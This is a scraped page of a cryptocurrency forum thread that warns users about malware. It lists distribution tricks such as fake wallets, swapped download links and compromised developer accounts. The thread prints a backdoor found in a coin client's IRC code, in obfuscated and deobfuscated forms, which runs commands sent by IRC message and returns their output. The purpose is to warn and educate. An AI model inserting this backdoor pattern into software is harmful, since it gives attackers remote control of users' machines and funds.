One cannot predict all the ways you will get infected. One effective way is to have a separate device for your cryptocurrency, keep it offline with a thumb drive.
Be skeptical before accessing anything online and it will take you a long way.
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 14. (Read 701343 times)
I'm adding this to the list of possible scams:
https://bitcointalksearch.org/topic/blockchain-different-from-source-code-951827
Thank you so much for this! My friend nearly got dumped with this but luckily I had seen your post just in time to prevent ithttps://bitcointalksearch.org/topic/blockchain-different-from-source-code-951827
Terrible people who are trying to steal money from others
he target of this virus is to spam and steal BitCoin. The most dangerous, is the theft of BitCoin. BitCoin price is very expensive and has skyrocketed to Rp 25 million more. Imagine you lost that precious BitCoin.
I think since the OP posted this, things has gotten a lot more complicated. The security of cryptocurrencies has improved, however the malwares and viruses has likely also improved. However, I believe the best thing to do is to be always prudent to protect yourself. Having some sort of security measure to protect your coins is essential, whether it be bitcoins or whatever altcoins. My security measure of choice is having a hardware wallet, it is a robust security device but still convenient to use.
I think we should be very careful about the infestations.Thank you very much for the overview and useful information, I Think that this site is very useful for scammers who want easy money. Forewarned is forearmed.
If you tought air-gapped devices are safe, read this: https://arstechnica.com/information-technology/2018/04/new-hacks-siphon-private-cryptocurrency-keys-from-airgapped-wallets/
Sounds to me like Person of interest, but still feasible in some ideal conditions.
Sounds to me like Person of interest, but still feasible in some ideal conditions.
If you can post the coins name it will be better
Nothing changes - the usual wallet is always interesting to thieves, and electronic - to various kinds of scammers. For reliable storage of electronic coins, it is better to start a so-called cool wallet on a computer that is not normally connected to the network.
I recommend engraving the mnemonic phrase on a stainless steel plate (both fire and water-proof, high corrosion resistance) and burry it in a safe location; a very good method to hold longer than you have planned your coins; better than an air-gapped computer and 100% hack-proof.
I led a large number of bounty, recorded everything on a flash drive, all tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this, really it is impossible to fight?
This year I am working on getting different wallets and a separate apple so that all the extra programms that I use do not counteract with the system operation itself.
I am newbie and thanks for informing. I would like to ask how can we spot a scammer
Is there still malware infection attempst? Thank you!!
this virus has spread and will hurt many people.
if the antivirus is no longer functioning, how we can avoid the virus attack. ?
if the antivirus is no longer functioning, how we can avoid the virus attack. ?
I am a new member, please help
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
yeah I can understand why you are so annoyed about itlets hope that they will work out something soon
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Thank you so much for the information I think we all must be more careful when we deal with our money- you have inspired me to review my antivirus"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
Bad software scare people the most, I use cash for complete security and I recommend doing so
I really commend your effort in sensitizing forum members, I will also like a continuous update on this all important issue to save from the pains scammers intend to inflict on especially novice like us. Thanks a lot.
I know it can be hard to believe but nobody should be shocked. It happens and we can always increase security, but it will never be 100% secure. Think about it, if someone is smart enough to make it, then that just means there is somebody out there smarter that can break it.
Jump to: